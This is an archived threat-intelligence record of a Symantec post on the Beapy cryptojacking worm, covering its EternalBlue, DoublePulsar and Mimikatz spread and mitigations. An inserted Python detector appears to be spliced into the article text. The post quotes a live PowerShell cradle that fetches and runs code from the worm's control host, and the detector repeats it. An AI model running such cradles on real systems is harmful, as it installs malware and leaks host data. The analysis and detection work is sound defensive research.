{
	"id": "642e9b98-9b32-4353-89a5-7c1df348bfe7",
	"created_at": "2026-04-06T01:31:02.974854Z",
	"updated_at": "2026-04-10T03:26:53.367451Z",
	"deleted_at": null,
	"sha1_hash": "1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713",
	"title": "Beapy: Cryptojacking Worm Hits Enterprises in China",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 65442,
	"plain_text": "Beapy: Cryptojacking Worm Hits Enterprises in China\r\nArchived: 2026-04-06 00:17:26 UTC\r\nBeapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy activity was first seen in Symantec telemetry in January 2019. This activity has also been seen on web servers and has been increasing since the beginning of March.\r\nBeapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector. This campaign demonstrates that while cryptojacking has declined in popularity with cyber criminals since its peak at the start of 2018, it is still a focus for some of them, with enterprises now their primary target.\r\nAlmost all of Beapy’s victims are enterprises (Figure 1). Beapy may indicate a continuation of a trend demonstrated by the Bluwimps worm (MSH.Bluwimps) in 2018, which we mentioned in ISTR 24: an increased focus by cryptojacking criminals on enterprises. While we have no evidence these attacks are targeted, Beapy’s wormlike capabilities indicate that it was probably always intended to spread throughout enterprise networks.\r\nFigure 1. Enterprise vs consumer infections of Beapy\r\nThis mirrors a trend we saw in ransomware in 2018 too when, despite a drop in overall ransomware infections of 20 percent, ransomware infections in enterprises increased by 12 percent. Enterprises appear to be an increasing focus for cyber criminals.\r\nBeapy is most heavily affecting enterprises in Asia, with more than 80 percent of its victims located in China and other victims in South Korea, Japan, and Vietnam.\r\nFigure 2. Beapy infections by region\r\nInfection chain\r\nMalicious emails are the initial vector for at least some Beapy infections. 
A malicious Excel document is delivered to victims as an email attachment. If the email recipient opens the malicious attachment, the DoublePulsar backdoor (Backdoor.Doublepulsar) is downloaded onto the target machine. DoublePulsar, like EternalBlue, was leaked in the Shadow Brokers dump and was also used in the destructive WannaCry ransomware attack in 2017. DoublePulsar opens a backdoor on infected machines and allows for remote code execution on compromised computers. EternalBlue exploits a vulnerability in the Windows SMBv1 protocol (patched by Microsoft in MS17-010 in March 2017) to execute code on unpatched machines, which is what lets the worm spread laterally across networks.\r\nhttps://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nPage 1 of 4\r\nOnce DoublePulsar is installed, a PowerShell command is executed, and contact is made with the Beapy command and control (C\u0026C) server, before a coinminer is downloaded onto the target computer. If we look at one example of a machine in Symantec telemetry, we see the earliest signs of suspicious activity on February 15, 2019, when the DoublePulsar backdoor is detected. We then see a PowerShell command being launched, which decodes to the following:\r\nIEX (New-Object Net.WebClient).downloadstring(' http://v.beahh.com/v' +$env:USERDOMAIN)\r\nThis is the device contacting the Beapy C\u0026C server; note that the request path carries the victim’s user domain. Some more PowerShell commands are executed and then a Monero coinminer is downloaded. This process is repeated as Beapy spreads to other computers on the network.\r\nBeapy appears to use unpatched machines to get a foothold on the network, and then uses EternalBlue to spread to other machines. However, EternalBlue isn’t Beapy’s only propagation technique: it also uses the credential-stealing tool Hacktool.Mimikatz to attempt to collect credentials from infected computers, which it can use to spread to even patched machines on the network. Beapy also uses a hardcoded list of usernames and passwords to attempt to spread across networks. 
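A detection check for the download cradle quoted above, added here as an example; it is not code from the Symantec post. It scans process creation command lines (the shape of Sysmon Event ID 1 or Security event 4688 records), decodes the base64-wrapped UTF-16LE script behind -EncodedCommand and its short forms, flags Invoke-Expression fed by a web download, and compares the host of any URL in the script against the command and control host named in the post. The record field names, the workstation names, the 203.0.113.5 address and all sample records are constructed for this example; only the decoded cradle text and v.beahh.com come from the post.

```python
# Added example, not code from the Symantec post: flag the PowerShell download
# cradle described above in process creation records. Sample records below are
# CONSTRUCTED; only the cradle text and the v.beahh.com host come from the post.
import base64
import re
from urllib.parse import urlsplit

# Beapy command and control host quoted in the post. Extend this set as more
# indicators become available.
KNOWN_C2_HOSTS = {'v.beahh.com'}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
# The (c|n...) group keeps -ExecutionPolicy / -ep from being taken for an encoded payload.
ENC_FLAG = re.compile(r'(?i)(?:^|[ ])-e(?:c|n[a-z]*)?[ ]+([A-Za-z0-9+/=]+)')
# Invoke-Expression (or its IEX alias) fed by a web download is the cradle shape
# quoted in the post: IEX (New-Object Net.WebClient).downloadstring(...)
INVOKE = re.compile(r'(?i)(?:^|[^a-z])(?:iex|invoke-expression)(?:$|[^a-z])')
DOWNLOAD = re.compile(r'(?i)downloadstring|downloadfile|net[.]webclient|invoke-webrequest')
URL = re.compile('''(?i)https?://[^ '()<>]+''')


def encode_ps(script):
    '''Wrap a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE.'''
    return base64.b64encode(script.encode('utf-16le')).decode('ascii')


def decode_encoded_command(cmd):
    '''Return the script hidden behind -EncodedCommand, or None when the command line
    has no such flag or its argument is not base64-wrapped UTF-16LE text.'''
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        text = base64.b64decode(m.group(1), validate=True).decode('utf-16le')
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    # Real scripts are printable text; bytes that merely happened to decode are not.
    if not all(ch.isprintable() or ch.isspace() for ch in text):
        return None
    return text


def analyze_command_line(cmd):
    '''Classify one command line. The decoded payload, when present, is what gets inspected.'''
    decoded = decode_encoded_command(cmd)
    effective = cmd if decoded is None else decoded
    urls = URL.findall(effective)
    hosts = sorted({urlsplit(u).hostname or '' for u in urls} - {''})
    return {
        'decoded': decoded,
        'is_cradle': bool(INVOKE.search(effective) and DOWNLOAD.search(effective)),
        'urls': urls,
        'hosts': hosts,
        'known_c2': any(h in KNOWN_C2_HOSTS for h in hosts),
    }


def scan(records):
    '''Return the records worth a ticket, most severe first. Encoded commands that are
    not download cradles are kept at low severity for review rather than dropped.'''
    findings = []
    for rec in records:
        result = analyze_command_line(rec['CommandLine'])
        if result['known_c2']:
            severity = 'critical'
        elif result['is_cradle']:
            severity = 'high'
        elif result['decoded'] is not None:
            severity = 'low'
        else:
            continue
        findings.append({'host': rec['Host'], 'severity': severity, **result})
    rank = {'critical': 0, 'high': 1, 'low': 2}
    return sorted(findings, key=lambda f: rank[f['severity']])


# Decoded command quoted in the post (the stray space inside the quotes is from the post).
BEAPY_CRADLE = '''IEX (New-Object Net.WebClient).downloadstring(' http://v.beahh.com/v' +$env:USERDOMAIN)'''

# CONSTRUCTED process creation records: one Beapy beacon, one benign script run,
# one plaintext cradle from a host not on the indicator list, one encoded
# command that is not a cradle, and one flag argument that is not valid base64.
SAMPLE_RECORDS = [
    {'Host': 'WS-0419', 'CommandLine': 'powershell.exe -NoP -W Hidden -enc ' + encode_ps(BEAPY_CRADLE)},
    {'Host': 'WS-0420', 'CommandLine': 'powershell.exe -ExecutionPolicy Bypass -File C:/scripts/inventory.ps1'},
    {'Host': 'SRV-WEB01', 'CommandLine': '''powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/up.txt')'''},
    {'Host': 'WS-0421', 'CommandLine': 'powershell.exe -e ' + encode_ps('Get-Service winrm')},
    {'Host': 'WS-0422', 'CommandLine': 'powershell.exe -e not-base64'},
]

if __name__ == '__main__':
    for f in scan(SAMPLE_RECORDS):
        print(f['severity'], f['host'], f['hosts'], 'encoded' if f['decoded'] else 'plain')
```

Because the beacon URL is the command and control host with the victim’s USERDOMAIN appended to the path, the same indicator can be hunted in proxy logs as requests to v.beahh.com whose path is /v followed by a domain name, which catches machines whose command line was never recorded. The prefix handling matters in practice: powershell.exe accepts any unambiguous prefix of -EncodedCommand, so a rule that only matches the full flag name misses most real samples.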
Spreading with harvested and hardcoded credentials is similar to how the Bluwimps worm operated. Bluwimps infected thousands of enterprise machines with coinminers in 2017 and 2018.\r\nWeb servers\r\nSymantec telemetry also found an earlier version of Beapy on a public-facing web server, with the worm then attempting to spread to computers connected to that server. One of the ways it appears to do this is by generating a list of IP addresses it attempts to infect.\r\nThe version of Beapy seen on the web server is an early version of the malware, coded in C rather than Python, the language of later versions. However, the activity is similar, with the downloaded malware also containing Mimikatz modules for credential harvesting, as well as EternalBlue exploit capabilities.\r\nIn the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution. Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C\u0026C server first observed on March 13. Activity targeting this web server continued until early April.\r\nIn general, Beapy activity has been increasing since the beginning of March.\r\nFigure 3. A sharp increase in Beapy detections is clearly visible\r\nWhat does Beapy’s activity tell us?\r\nDespite a 52 percent drop in cryptojacking activity in 2018, this is still an area of interest for cyber criminals. Looking at the overall figures for cryptojacking, we can see that there were just under 3 million cryptojacking attempts in March 2019. 
While a big drop from the peak of February 2018, when there were 8 million cryptojacking attempts, it is still a significant figure.\r\nFigure 4. Cryptojacking activity, January 2018 to March 2019\r\nBeapy is a file-based coinminer, which is interesting as most of the cryptojacking activity we saw at the height of its popularity was carried out using browser-based coinminers, which were popular due to lower barriers to entry and because they allowed even fully patched machines to be targeted. The announcement that the Coinhive coin-mining service, which was launched in September 2017 and played a key role in the growth of cryptojacking, was closing down also probably contributed to the fall in browser-based cryptojacking. The service, which made it a lot easier for anyone to carry out browser-based coin mining, ceased operations at the start of March. The shuttering of this service is likely to have a dramatic impact on browser-based cryptojacking.\r\nAs well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster. The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.\r\nFigure 5. Comparing profitability of browser-based and file-based coin-mining botnets\r\nEffects of cryptojacking on enterprises\r\nWhile enterprises might think they don’t need to worry about cryptojacking as much as more disruptive threats such as ransomware, it could still have a major impact on the company’s operations.\r\nPotential impacts of cryptojacking for businesses include:\r\nA slowdown in devices’ performance, potentially leading to employee frustration and a reduction in productivity\r\nOverheating batteries\r\nDevices becoming degraded and unusable, leading to higher IT costs\r\nIncreased costs due to increased electricity usage, and for businesses operating in the cloud that are billed based on CPU usage\r\nEnterprises need to ensure their networks are protected from the whole range of cyber security threats.\r\nMitigation\r\nEmphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point failures in any specific technology or protection method. This includes deployment of endpoint, email, and web gateway protection technologies as well as firewalls and vulnerability assessment solutions. 
Always keep these security solutions up to date with the latest protection capabilities.\r\nEducate anyone using your device or network and urge them to exercise caution around emails from unfamiliar sources and around opening attachments that haven’t been solicited, which may contain file-based coin-mining malware.\r\nEducate employees about the signs that indicate their computer may have a coinminer and instruct them to inform IT immediately if they think there may be a coinminer on a device that is on the company network.\r\nMonitor battery usage on your device and, if you notice a suspicious spike in usage, scan it for the presence of any file-based miners.\r\nInstall the latest patches on your devices (in particular MS17-010, which closes the SMBv1 flaw that EternalBlue exploits), use strong passwords and enable two-factor authentication.\r\nProtection\r\nSymantec has the following protection in place to protect customers against these kinds of attacks:\r\nW32.Beapy\r\nHacktool.Mimikatz\r\nMSH.Bluwimps\r\nBackdoor.Doublepulsar\r\nSymantec Email Security.cloud technology blocks email spreading this threat using advanced heuristics.\r\nFurther Reading\r\nFor more information about cryptojacking, read our whitepaper: Cryptojacking: A Modern Cash Cow\r\nThreat Hunter Team\r\nSymantec and Carbon Black\r\nSource: https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china"
	],
	"report_names": [
		"beapy-cryptojacking-worm-china"
	],
	"threat_actors": [
		{
			"id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5",
			"created_at": "2022-10-25T16:07:24.561104Z",
			"updated_at": "2026-04-10T02:00:05.03343Z",
			"deleted_at": null,
			"main_name": "Shadow Brokers",
			"aliases": [],
			"source_name": "ETDA:Shadow Brokers",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "171b85f2-8f6f-46c0-92e0-c591f61ea167",
			"created_at": "2023-01-06T13:46:38.830188Z",
			"updated_at": "2026-04-10T02:00:03.114926Z",
			"deleted_at": null,
			"main_name": "The Shadow Brokers",
			"aliases": [
				"Shadow Brokers",
				"ShadowBrokers",
				"The ShadowBrokers",
				"TSB"
			],
			"source_name": "MISPGALAXY:The Shadow Brokers",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439062,
	"ts_updated_at": 1775791613,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.pdf",
		"text": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.txt",
		"img": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.jpg"
	}
}